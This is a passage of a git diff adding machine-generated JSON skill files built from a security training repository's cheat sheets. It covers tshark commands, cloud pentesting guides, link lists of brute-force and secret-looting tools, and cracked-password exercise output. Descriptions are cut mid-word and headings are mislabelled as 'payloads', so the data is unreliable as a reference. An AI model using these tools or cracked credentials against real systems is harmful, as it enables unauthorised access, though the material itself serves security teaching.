+ "- [Loops](#loops)",
+ "- [Functions](#functions)",
+ "- [File Operations](#file-operations)",
+ "- [String Manipulation](#string-manipulation)",
+ "- [Arrays](#arrays)",
+ "- [Security Scripts](#security-scripts)",
+ "## Basic Syntax",
+ "### Shebang and Execution"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/scripting/bash.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_c95751e2c3b7.json b/skills/cheat_sheets_c95751e2c3b7.json
new file mode 100644
index 0000000..e71d1d6
--- /dev/null
+++ b/skills/cheat_sheets_c95751e2c3b7.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_c95751e2c3b7",
+ "category": "cheat-sheets",
+ "title": "python security",
+ "description": "# Python for Cybersecurity Cheat Sheet\n\nPython is one of the most popular programming languages for cybersecurity automation, scripting, and tool development.\n\n## \ud83d\udccb Table of Contents\n- [Basic Python](#basic-python)\n- [Networking](#networking)\n- [Web Scraping](#web-scraping)\n- [File Operations](#file-operations)\n- [Cryptography](#cryptography)\n- [System Operations](#system-operations)\n- [Security Libraries](#security-libraries)\n- [Exploit Development](#exploit-development)\n- [Automation Scripts](",
+ "payloads": [
+ "# Python for Cybersecurity Cheat Sheet",
+ "Python is one of the most popular programming languages for cybersecurity automation, scripting, and tool development.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Python](#basic-python)",
+ "- [Networking](#networking)",
+ "- [Web Scraping](#web-scraping)",
+ "- [File Operations](#file-operations)",
+ "- [Cryptography](#cryptography)",
+ "- [System Operations](#system-operations)",
+ "- [Security Libraries](#security-libraries)",
+ "- [Exploit Development](#exploit-development)",
+ "- [Automation Scripts](#automation-scripts)",
+ "## Basic Python",
+ "### Data Types and Variables",
+ "```python"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/scripting/python-security.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_d37fb93cc19b.json b/skills/cheat_sheets_d37fb93cc19b.json
new file mode 100644
index 0000000..870a1a3
--- /dev/null
+++ b/skills/cheat_sheets_d37fb93cc19b.json
@@ -0,0 +1,19 @@
+{
+ "id": "cheat_sheets_d37fb93cc19b",
+ "category": "cheat-sheets",
+ "title": "access control",
+ "description": "# Discretionary Access Control (DAC), Mandatory Access Control (MAC), Role-Based Access Control (RBAC), and Attribute-Based Access Control (ABAC)\n\n| Feature | DAC | MAC | RBAC | ABAC |\n|------------------------|------------------------------------------------------|---------------------",
+ "payloads": [
+ "# Discretionary Access Control (DAC), Mandatory Access Control (MAC), Role-Based Access Control (RBAC), and Attribute-Based Access Control (ABAC)",
+ "| Feature | DAC | MAC | RBAC | ABAC |",
+ "|------------------------|------------------------------------------------------|----------------------------------------------------|------------------------------------------------------|------------------------------------------------------------|",
+ "| Access Control Basis | Based on identity of the requester and the discretion of the owner | Based on classifications and security clearances | Based on roles within an organization | Based on attributes (user, resource, environment) |",
+ "| Access Decision | Owners of the resource decide who can access it | System-enforced, not changeable by users | Access based on roles and their permissions | Decisions based on a set of policies involving attributes |",
+ "| Flexibility | Highly flexible with individualized control | Less flexible, focuses on classification levels | Moderately flexible, easy to manage | Highly flexible and granular |",
+ "| Complexity | Can become complex with many users and permissions | High, due to strict policy enforcement | Medium, depends on roles and permissions setup | High, due to complex policy definitions |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/firewall/access-control.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_e5a3ac62a083.json b/skills/cheat_sheets_e5a3ac62a083.json
new file mode 100644
index 0000000..72f8db0
--- /dev/null
+++ b/skills/cheat_sheets_e5a3ac62a083.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_e5a3ac62a083",
+ "category": "cheat-sheets",
+ "title": "tshark",
+ "description": "# Tshark Cheat Sheet\n\n## List interfaces on which Tshark can capture\n```\ntshark -D\n```\n\n## Capture Packets with Tshark\n```\ntshark -i eth0 -w capture-file.pcap\n```\n\n## Read a Pcap with Tshark\n```\ntshark -r capture-file.pcap\n```\n\n## Filtering Packets from One Host\n```\ntshark -i eth0 -p -w capture-file.cap host 10.1.2.3\n```\n\n## HTTP Analysis with Tshark\nThe `-T` option specifies that we want to extract fields and with the `-e` options we identify which fields we want to extract.\n\n```\ntshark -i eth0",
+ "payloads": [
+ "# Tshark Cheat Sheet",
+ "## List interfaces on which Tshark can capture",
+ "tshark -D",
+ "## Capture Packets with Tshark",
+ "tshark -i eth0 -w capture-file.pcap",
+ "## Read a Pcap with Tshark",
+ "tshark -r capture-file.pcap",
+ "## Filtering Packets from One Host",
+ "tshark -i eth0 -p -w capture-file.cap host 10.1.2.3",
+ "## HTTP Analysis with Tshark",
+ "The `-T` option specifies that we want to extract fields and with the `-e` options we identify which fields we want to extract.",
+ "tshark -i eth0 -Y http.request -T fields -e http.host -e http.user_agent",
+ "## Manipulating other Fields",
+ "This command will extract files from an SMB stream and extract them to the location tmpfolder.",
+ "tshark -nr test.pcap --export-objects smb,tmpfolder"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/tshark.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_e805a5d6d0e9.json b/skills/cheat_sheets_e805a5d6d0e9.json
new file mode 100644
index 0000000..69882ab
--- /dev/null
+++ b/skills/cheat_sheets_e805a5d6d0e9.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_e805a5d6d0e9",
+ "category": "cheat-sheets",
+ "title": "insecure protocols",
+ "description": "# Insecure Protocols and Services\n\n## Insecure Protocols\nThe following are also some of the protocols that are considered insecure:\n\n- Rlogin: https://linux.die.net/man/1/rlogin\n- Rsh: https://linux.die.net/man/1/rsh\n- Finger: https://linux.die.net/man/1/finger\n\n\n## Insecure Services\nThe following services should be carefully implemented and not exposed to untrusted networks:\n\n- Authd (or Identd): https://linux.die.net/man/3/ident\n- Netdump: https://linux.die.net/man/8/netdump\n- Netdump-server: ",
+ "payloads": [
+ "# Insecure Protocols and Services",
+ "## Insecure Protocols",
+ "The following are also some of the protocols that are considered insecure:",
+ "- Rlogin: https://linux.die.net/man/1/rlogin",
+ "- Rsh: https://linux.die.net/man/1/rsh",
+ "- Finger: https://linux.die.net/man/1/finger",
+ "## Insecure Services",
+ "The following services should be carefully implemented and not exposed to untrusted networks:",
+ "- Authd (or Identd): https://linux.die.net/man/3/ident",
+ "- Netdump: https://linux.die.net/man/8/netdump",
+ "- Netdump-server: https://linux.die.net/man/8/netdump-server",
+ "- Nfs: https://linux.die.net/man/5/nfs",
+ "- Rwhod: https://linux.die.net/man/8/rwhod",
+ "- Sendmail: https://linux.die.net/man/8/sendmail.sendmail",
+ "- Samba: https://linux.die.net/man/7/samba"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/insecure-protocols.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_e84f5b192d85.json b/skills/cheat_sheets_e84f5b192d85.json
new file mode 100644
index 0000000..61fa0cc
--- /dev/null
+++ b/skills/cheat_sheets_e84f5b192d85.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_e84f5b192d85",
+ "category": "cheat-sheets",
+ "title": "survival guide",
+ "description": "# Linux Survival Guide for Cybersecurity\n\nA comprehensive guide to essential Linux commands and techniques for cybersecurity professionals.\n\n## \ud83d\udccb Table of Contents\n- [Linux Survival Guide for Cybersecurity](#linux-survival-guide-for-cybersecurity)\n - [\ud83d\udccb Table of Contents](#-table-of-contents)\n - [File System Navigation](#file-system-navigation)\n - [File Operations](#file-operations)\n - [Text Processing](#text-processing)\n - [Process Management](#process-management)\n - [User Management](#us",
+ "payloads": [
+ "# Linux Survival Guide for Cybersecurity",
+ "A comprehensive guide to essential Linux commands and techniques for cybersecurity professionals.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Linux Survival Guide for Cybersecurity](#linux-survival-guide-for-cybersecurity)",
+ "- [\ud83d\udccb Table of Contents](#-table-of-contents)",
+ "- [File System Navigation](#file-system-navigation)",
+ "- [File Operations](#file-operations)",
+ "- [Text Processing](#text-processing)",
+ "- [Process Management](#process-management)",
+ "- [User Management](#user-management)",
+ "- [Permissions](#permissions)",
+ "- [Networking](#networking)",
+ "- [System Information](#system-information)",
+ "- [Package Management](#package-management)",
+ "- [Debian/Ubuntu (APT)](#debianubuntu-apt)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/linux/survival-guide.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_eb60c7012a26.json b/skills/cheat_sheets_eb60c7012a26.json
new file mode 100644
index 0000000..61c8581
--- /dev/null
+++ b/skills/cheat_sheets_eb60c7012a26.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_eb60c7012a26",
+ "category": "cheat-sheets",
+ "title": "regex",
+ "description": "# Regular Expression Cheat Sheets and Resources\n- [ Regular Expression Cheat Sheet](https://web.mit.edu/hackl/www/lab/turkshop/slides/regex-cheatsheet.pdf)\n- [Quick-Start: Regex Cheat Sheet](https://www.rexegg.com/regex-quickstart.html)\n- [RegexR - Generate Regular Expressions](https://regexr.com)\n- [RegexOne Exercises](https://regexone.com)\n- [Regex Crossword](https://regexcrossword.com)\n- [Regex101](https://regex101.com/)\n\n## Quick Regex Reference\n\n
",
+ "",
+ "
Character
",
+ "
Meaning
",
+ "
Example
",
+ "
*
",
+ "
Match zero, one or more of the previous
"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/scripting/regex.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_362c424ef035.json b/skills/cloud_resources_362c424ef035.json
new file mode 100644
index 0000000..2e651fb
--- /dev/null
+++ b/skills/cloud_resources_362c424ef035.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_362c424ef035",
+ "category": "cloud-resources",
+ "title": "tools",
+ "description": "# Cloud Resources Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [ASSAMEE - Free Advance Encryptor For Anon Cloud](http://www.kitploit.com/2022/03/assamee-free-advance-encryptor-for-anon.html)\n- [AWS Recon - Multi-threaded AWS Inventory Collection Tool With A Focus On Security-Relevant Resources And Metadata](http://feedproxy.google.com/~r/PentestTools/~3/mCRMljaSu2w/aws-recon-multi-threaded-aws-inventory.html)\n- [AWS Report - A Tool For Analyzing Amazon Resources](http://feed",
+ "payloads": [
+ "# Cloud Resources Tools",
+ "This is a curated list of tools for this category.",
+ "- [ASSAMEE - Free Advance Encryptor For Anon Cloud](http://www.kitploit.com/2022/03/assamee-free-advance-encryptor-for-anon.html)",
+ "- [AWS Recon - Multi-threaded AWS Inventory Collection Tool With A Focus On Security-Relevant Resources And Metadata](http://feedproxy.google.com/~r/PentestTools/~3/mCRMljaSu2w/aws-recon-multi-threaded-aws-inventory.html)",
+ "- [AWS Report - A Tool For Analyzing Amazon Resources](http://feedproxy.google.com/~r/PentestTools/~3/pKUBrpmSvbE/aws-report-tool-for-analyzing-amazon.html)",
+ "- [AWS Report - Tool For Analyzing Amazon Resources](http://feedproxy.google.com/~r/PentestTools/~3/SAdoyWAz1c4/aws-report-tool-for-analyzing-amazon.html)",
+ "- [AWS-Loot - Pull Secrets From An AWS Environment](http://www.kitploit.com/2022/02/aws-loot-pull-secrets-from-aws.html)",
+ "- [AWS-Threat-Simulation-and-Detection - Playing Around With Stratus Red Team (Cloud Attack Simulation Tool) And SumoLogic](http://www.kitploit.com/2022/06/aws-threat-simulation-and-detection.html)",
+ "- [AWSGen.py - Generates Permutations, Alterations And Mutations Of AWS S3 Buckets Names](http://feedproxy.google.com/~r/PentestTools/~3/SagQLMEKNHs/awsgenpy-generates-permutations.html)",
+ "- [Aaia - AWS Identity And Access Management Visualizer And Anomaly Finder](http://feedproxy.google.com/~r/PentestTools/~3/2yvKL6xqlqM/aaia-aws-identity-and-access-management.html)",
+ "- [AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model](http://feedproxy.google.com/~r/PentestTools/~3/Wz_C66kvWFE/alertresponder-automatic-security-alert.html)",
+ "- [Anchore Engine - A Service That Analyzes Docker Images And Applies User-Defined Acceptance Policies To Allow Automated Container Image Validation And Certification](http://feedproxy.google.com/~r/PentestTools/~3/Ll18a8n6Jxg/anchore-engine-service-that-analyzes.html)",
+ "- [ArmourBird CSF - Container Security Framework](http://feedproxy.google.com/~r/PentestTools/~3/QrsSVDyTOII/armourbird-csf-container-security.html)",
+ "- [AutomatedLab - A Provisioning Solution And Framework That Lets You Deploy Complex Labs On HyperV And Azure With Simple PowerShell Scripts](http://feedproxy.google.com/~r/PentestTools/~3/f2dNEhwRatY/automatedlab-provisioning-solution-and.html)",
+ "- [Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks](http://www.kitploit.com/2023/02/aws-security-assessment-solution-aws.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_3ee9b9a02457.json b/skills/cloud_resources_3ee9b9a02457.json
new file mode 100644
index 0000000..09125f5
--- /dev/null
+++ b/skills/cloud_resources_3ee9b9a02457.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_3ee9b9a02457",
+ "category": "cloud-resources",
+ "title": "high level best practices pen testing",
+ "description": "# Cloud Penetration Testing Best Practices Guide\n\n## Table of Contents\n- [Overview](#overview)\n- [Pre-Testing Requirements](#pre-testing-requirements)\n- [Cloud Provider Policies](#cloud-provider-policies)\n- [Testing Methodology](#testing-methodology)\n- [Cloud-Native Security Testing](#cloud-native-security-testing)\n- [Identity and Access Management Testing](#identity-and-access-management-testing)\n- [Data Protection and Compliance](#data-protection-and-compliance)\n- [Automated Testing Integratio",
+ "payloads": [
+ "# Cloud Penetration Testing Best Practices Guide",
+ "## Table of Contents",
+ "- [Overview](#overview)",
+ "- [Pre-Testing Requirements](#pre-testing-requirements)",
+ "- [Cloud Provider Policies](#cloud-provider-policies)",
+ "- [Testing Methodology](#testing-methodology)",
+ "- [Cloud-Native Security Testing](#cloud-native-security-testing)",
+ "- [Identity and Access Management Testing](#identity-and-access-management-testing)",
+ "- [Data Protection and Compliance](#data-protection-and-compliance)",
+ "- [Automated Testing Integration](#automated-testing-integration)",
+ "- [Reporting and Remediation](#reporting-and-remediation)",
+ "- [Post-Testing Activities](#post-testing-activities)",
+ "## Overview",
+ "Penetration testing in cloud environments requires specialized knowledge of cloud architectures, shared responsibility models, and modern cloud-native technologies. This guide provides comprehensive best practices for conducting effective and responsible cloud security assessments in 2024 and beyond.",
+ "## Pre-Testing Requirements"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/high_level_best_practices_pen_testing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_55e840fb0b25.json b/skills/cloud_resources_55e840fb0b25.json
new file mode 100644
index 0000000..b0de21d
--- /dev/null
+++ b/skills/cloud_resources_55e840fb0b25.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_55e840fb0b25",
+ "category": "cloud-resources",
+ "title": "cloud risks threats",
+ "description": "# Understanding Cloud Security: Risks, Threats, and Challenges (2024 Edition)\n\n## Table of Contents\n- [Key Concepts](#key-concepts)\n- [2024 Cloud Security Landscape](#2024-cloud-security-landscape)\n- [Common Cloud Security Risks](#common-cloud-security-risks)\n- [Emerging and Current Threats](#emerging-and-current-threats)\n- [Cloud-Native Security Challenges](#cloud-native-security-challenges)\n- [Mitigation Strategies and Best Practices](#mitigation-strategies-and-best-practices)\n- [Compliance an",
+ "payloads": [
+ "# Understanding Cloud Security: Risks, Threats, and Challenges (2024 Edition)",
+ "## Table of Contents",
+ "- [Key Concepts](#key-concepts)",
+ "- [2024 Cloud Security Landscape](#2024-cloud-security-landscape)",
+ "- [Common Cloud Security Risks](#common-cloud-security-risks)",
+ "- [Emerging and Current Threats](#emerging-and-current-threats)",
+ "- [Cloud-Native Security Challenges](#cloud-native-security-challenges)",
+ "- [Mitigation Strategies and Best Practices](#mitigation-strategies-and-best-practices)",
+ "- [Compliance and Governance](#compliance-and-governance)",
+ "- [Implementation Checklist](#implementation-checklist)",
+ "- [Conclusion](#conclusion)",
+ "- [References and Further Reading](#references-and-further-reading)",
+ "## Key Concepts",
+ "Understanding the fundamental differences between risks, threats, and challenges is crucial for effective cloud security:",
+ "| Term | Definition | Example |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/cloud_risks_threats.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_726c32594985.json b/skills/cloud_resources_726c32594985.json
new file mode 100644
index 0000000..91cdbf3
--- /dev/null
+++ b/skills/cloud_resources_726c32594985.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_726c32594985",
+ "category": "cloud-resources",
+ "title": "enumerating aws boto3",
+ "description": "# AWS Security Assessment with Boto3\n\nA comprehensive guide for enumerating AWS resources using Boto3, the AWS SDK for Python, for security assessments and penetration testing.\n\n## Table of Contents\n- [Prerequisites](#prerequisites)\n- [Installation](#installation)\n- [Authentication Setup](#authentication-setup)\n- [Basic Enumeration Script](#basic-enumeration-script)\n- [Advanced Enumeration](#advanced-enumeration)\n- [Security Considerations](#security-considerations)\n- [Modern Security Tools](#mo",
+ "payloads": [
+ "# AWS Security Assessment with Boto3",
+ "A comprehensive guide for enumerating AWS resources using Boto3, the AWS SDK for Python, for security assessments and penetration testing.",
+ "## Table of Contents",
+ "- [Prerequisites](#prerequisites)",
+ "- [Installation](#installation)",
+ "- [Authentication Setup](#authentication-setup)",
+ "- [Basic Enumeration Script](#basic-enumeration-script)",
+ "- [Advanced Enumeration](#advanced-enumeration)",
+ "- [Security Considerations](#security-considerations)",
+ "- [Modern Security Tools](#modern-security-tools)",
+ "- [Best Practices](#best-practices)",
+ "- [Troubleshooting](#troubleshooting)",
+ "## Prerequisites",
+ "- Python 3.7 or higher",
+ "- Valid AWS credentials with appropriate permissions"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/enumerating_aws_boto3.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_a5f4aaac07e8.json b/skills/cloud_resources_a5f4aaac07e8.json
new file mode 100644
index 0000000..ef2d6cb
--- /dev/null
+++ b/skills/cloud_resources_a5f4aaac07e8.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_a5f4aaac07e8",
+ "category": "cloud-resources",
+ "title": "cloud logging",
+ "description": "# Cloud Logging Security Guide\n\nCloud logging is a critical component of cloud security architecture, involving the systematic collection, analysis, and secure storage of logs from cloud resources and services. Effective cloud logging enables real-time monitoring, incident response, compliance adherence, and threat detection in cloud environments.\n\n## Table of Contents\n- [Cloud Platform Logging Capabilities](#cloud-platform-logging-capabilities)\n- [Cloud Logging Security Threats](#cloud-logging-",
+ "payloads": [
+ "# Cloud Logging Security Guide",
+ "Cloud logging is a critical component of cloud security architecture, involving the systematic collection, analysis, and secure storage of logs from cloud resources and services. Effective cloud logging enables real-time monitoring, incident response, compliance adherence, and threat detection in cloud environments.",
+ "## Table of Contents",
+ "- [Cloud Platform Logging Capabilities](#cloud-platform-logging-capabilities)",
+ "- [Cloud Logging Security Threats](#cloud-logging-security-threats)",
+ "- [Best Practices](#cloud-logging-best-practices)",
+ "- [Compliance Requirements](#compliance-requirements)",
+ "- [Modern Logging Practices](#modern-logging-practices)",
+ "- [Cost Optimization](#cost-optimization)",
+ "## Cloud Platform Logging Capabilities",
+ "The following table provides a comprehensive comparison of logging capabilities across major cloud platforms:",
+ "| Feature | AWS | Azure | GCP |",
+ "|----------------------------------|---------------------------------------------------------------------|--------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------|",
+ "| **Activity Logging** | [CloudTrail](https://aws.amazon.com/cloudtrail/) | [Azure Activity Log](https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log) | [Cloud Logging](https://cloud.google.com/logging) |",
+ "| **Resource Access Logging** | [S3 Access Logs](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html) | [Storage Analytics Logging](https://learn.microsoft.com/en-us/azure/storage/common/storage-analytics-logging) | [Cloud Audit Logs](https://cloud.google.com/logging/docs/audit) |"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/cloud_logging.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cloud_resources_a78fc622ace1.json b/skills/cloud_resources_a78fc622ace1.json
new file mode 100644
index 0000000..586445d
--- /dev/null
+++ b/skills/cloud_resources_a78fc622ace1.json
@@ -0,0 +1,27 @@
+{
+ "id": "cloud_resources_a78fc622ace1",
+ "category": "cloud-resources",
+ "title": "questions to ask your provider",
+ "description": "# Security Assessment in the Cloud: Key Considerations and Questions for Your Cloud Service Provider\n\n## Table of Contents\n1. [Key Considerations for Cloud Security Assessment](#key-considerations-for-cloud-security-assessment)\n2. [Questions to Ask Your Cloud Service Provider](#questions-to-ask-your-cloud-service-provider)\n - [General Security Practices](#general-security-practices)\n - [Data Security and Privacy](#data-security-and-privacy)\n - [Identity and Access Management](#identity-and",
+ "payloads": [
+ "# Security Assessment in the Cloud: Key Considerations and Questions for Your Cloud Service Provider",
+ "## Table of Contents",
+ "1. [Key Considerations for Cloud Security Assessment](#key-considerations-for-cloud-security-assessment)",
+ "2. [Questions to Ask Your Cloud Service Provider](#questions-to-ask-your-cloud-service-provider)",
+ "- [General Security Practices](#general-security-practices)",
+ "- [Data Security and Privacy](#data-security-and-privacy)",
+ "- [Identity and Access Management](#identity-and-access-management)",
+ "- [Compliance and Regulatory Adherence](#compliance-and-regulatory-adherence)",
+ "- [Incident Response and Recovery](#incident-response-and-recovery)",
+ "- [Network and Application Security](#network-and-application-security)",
+ "- [Monitoring and Reporting](#monitoring-and-reporting)",
+ "- [Supply Chain Security](#supply-chain-security)",
+ "- [Zero Trust Architecture](#zero-trust-architecture)",
+ "- [Container and Kubernetes Security](#container-and-kubernetes-security)",
+ "- [Serverless Security](#serverless-security)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cloud-resources/questions_to_ask_your_provider.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cracking_passwords_3719606b672f.json b/skills/cracking_passwords_3719606b672f.json
new file mode 100644
index 0000000..2167274
--- /dev/null
+++ b/skills/cracking_passwords_3719606b672f.json
@@ -0,0 +1,27 @@
+{
+ "id": "cracking_passwords_3719606b672f",
+ "category": "cracking-passwords",
+ "title": "tools",
+ "description": "# Cracking Passwords Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [Admin-Scanner - This Tool Is Design To Find Admin Panel Of Any Website By Using Custom Wordlist Or Default Wordlist Easily](http://feedproxy.google.com/~r/PentestTools/~3/MVzNQiWJ3DA/admin-scanner-this-tool-is-design-to.html)\n- [Aiodnsbrute - DNS Asynchronous Brute Force Utility](http://www.kitploit.com/2022/07/aiodnsbrute-dns-asynchronous-brute.html)\n- [Assless-Chaps - Crack MSCHAPv2 Challenge/Responses Quic",
+ "payloads": [
+ "# Cracking Passwords Tools",
+ "This is a curated list of tools for this category.",
+ "- [Admin-Scanner - This Tool Is Design To Find Admin Panel Of Any Website By Using Custom Wordlist Or Default Wordlist Easily](http://feedproxy.google.com/~r/PentestTools/~3/MVzNQiWJ3DA/admin-scanner-this-tool-is-design-to.html)",
+ "- [Aiodnsbrute - DNS Asynchronous Brute Force Utility](http://www.kitploit.com/2022/07/aiodnsbrute-dns-asynchronous-brute.html)",
+ "- [Assless-Chaps - Crack MSCHAPv2 Challenge/Responses Quickly Using A Database Of NT Hashes](http://feedproxy.google.com/~r/PentestTools/~3/-YTusn0Rks8/assless-chaps-crack-mschapv2.html)",
+ "- [Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security](http://www.kitploit.com/2022/08/awesome-password-cracking-curated-list.html)",
+ "- [BirDuster - A Multi Threaded Python Script Designed To Brute Force Directories And Files Names On Webservers](http://www.kitploit.com/2022/05/birduster-multi-threaded-python-script.html)",
+ "- [Bopscrk - Tool To Generate Smart And Powerful Wordlists](http://feedproxy.google.com/~r/PentestTools/~3/tVnIBBKBI-c/bopscrk-tool-to-generate-smart-and.html)",
+ "- [BruteDum - Brute Force Attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC With Hydra, Medusa And Ncrack](http://feedproxy.google.com/~r/PentestTools/~3/3Z-_-kI5aD8/brutedum-brute-force-attacks-ssh-ftp.html)",
+ "- [Cbrutekrag - Penetration Tests On SSH Servers Using Brute Force Or Dictionary Attacks. Written In C](https://www.kitploit.com/2023/05/cbrutekrag-penetration-tests-on-ssh.html)",
+ "- [Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash](http://www.kitploit.com/2023/06/certsync-dump-ntds-with-golden.html)",
+ "- [Check-LocalAdminHash - A PowerShell Tool That Attempts To Authenticate To Multiple Hosts Over Either WMI Or SMB Using A Password Hash To Determine If The Provided Credential Is A Local Administrator](http://feedproxy.google.com/~r/PentestTools/~3/-OGGgCcLOic/check-localadminhash-powershell-tool.html)",
+ "- [Colabcat - Running Hashcat On Google Colab With Session Backup And Restore](http://feedproxy.google.com/~r/PentestTools/~3/d9pPqRQqGW8/colabcat-running-hashcat-on-google.html)",
+ "- [Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool](http://www.kitploit.com/2021/11/cracken-fast-password-wordlist.html)",
+ "- [CrackerJack - Web GUI for Hashcat](http://feedproxy.google.com/~r/PentestTools/~3/1MrynPby-_E/crackerjack-web-gui-for-hashcat.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cracking-passwords/tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cracking_passwords_4836f2878cff.json b/skills/cracking_passwords_4836f2878cff.json
new file mode 100644
index 0000000..fa34165
--- /dev/null
+++ b/skills/cracking_passwords_4836f2878cff.json
@@ -0,0 +1,19 @@
+{
+ "id": "cracking_passwords_4836f2878cff",
+ "category": "cracking-passwords",
+ "title": "cracked2",
+ "description": "# Cracked Passwords\nThe following are the cracked passwords of \"Exercise 1.2: Cracking Passwords with John the Ripper\" of the Safari Live Training: Ethical Hacking Bootcamp by Omar Santos\n\n```\nroot@kali:~# cat cracked.txt\n476c6c4a9735ecaff882a6e01bcda6e8:blue123\n17a807c3a10ee2d8ed555ddfb8c0f790:boricua\nd0f98c2b1656b2f20c731d086dc68d1c:destiny1\ndc647eb65e6711e155375218212b3964:Password\n```\n",
+ "payloads": [
+ "# Cracked Passwords",
+ "The following are the cracked passwords of \"Exercise 1.2: Cracking Passwords with John the Ripper\" of the Safari Live Training: Ethical Hacking Bootcamp by Omar Santos",
+ "root@kali:~# cat cracked.txt",
+ "476c6c4a9735ecaff882a6e01bcda6e8:blue123",
+ "17a807c3a10ee2d8ed555ddfb8c0f790:boricua",
+ "d0f98c2b1656b2f20c731d086dc68d1c:destiny1",
+ "dc647eb65e6711e155375218212b3964:Password"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cracking-passwords/cracked2.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cracking_passwords_604dabb43dde.json b/skills/cracking_passwords_604dabb43dde.json
new file mode 100644
index 0000000..5b23eaf
--- /dev/null
+++ b/skills/cracking_passwords_604dabb43dde.json
@@ -0,0 +1,27 @@
+{
+ "id": "cracking_passwords_604dabb43dde",
+ "category": "cracking-passwords",
+ "title": "cracked",
+ "description": "# Cracked Passwords\nThe following are the cracked passwords of the exercise \"Cracking Passwords with John the Ripper\" of the O'Reilly Live Training: Ethical Hacking Bootcamp by Omar Santos\n\n```\nroot@kali:~# john hashes\nWarning: detected hash type \"sha512crypt\", but the string is also recognized as \"crypt\"\nUse the \"--format=crypt\" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA51",
+ "payloads": [
+ "# Cracked Passwords",
+ "The following are the cracked passwords of the exercise \"Cracking Passwords with John the Ripper\" of the O'Reilly Live Training: Ethical Hacking Bootcamp by Omar Santos",
+ "root@kali:~# john hashes",
+ "Warning: detected hash type \"sha512crypt\", but the string is also recognized as \"crypt\"",
+ "Use the \"--format=crypt\" option to force loading these as that type instead",
+ "Using default input encoding: UTF-8",
+ "Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])",
+ "Press 'q' or Ctrl-C to abort, almost any other key for status",
+ "letmein (batman)",
+ "password1 (superman)",
+ "password (spiderman)",
+ "3g 0:00:00:08 DONE 2/3 (2019-01-12 21:22) 0.3496g/s 1038p/s 1053c/s 1053C/s 123456..green",
+ "Use the \"--show\" option to display all of the cracked passwords reliably",
+ "Session completed",
+ "root@kali:~#"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cracking-passwords/cracked.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cracking_passwords_e6d31dc813cf.json b/skills/cracking_passwords_e6d31dc813cf.json
new file mode 100644
index 0000000..ee22659
--- /dev/null
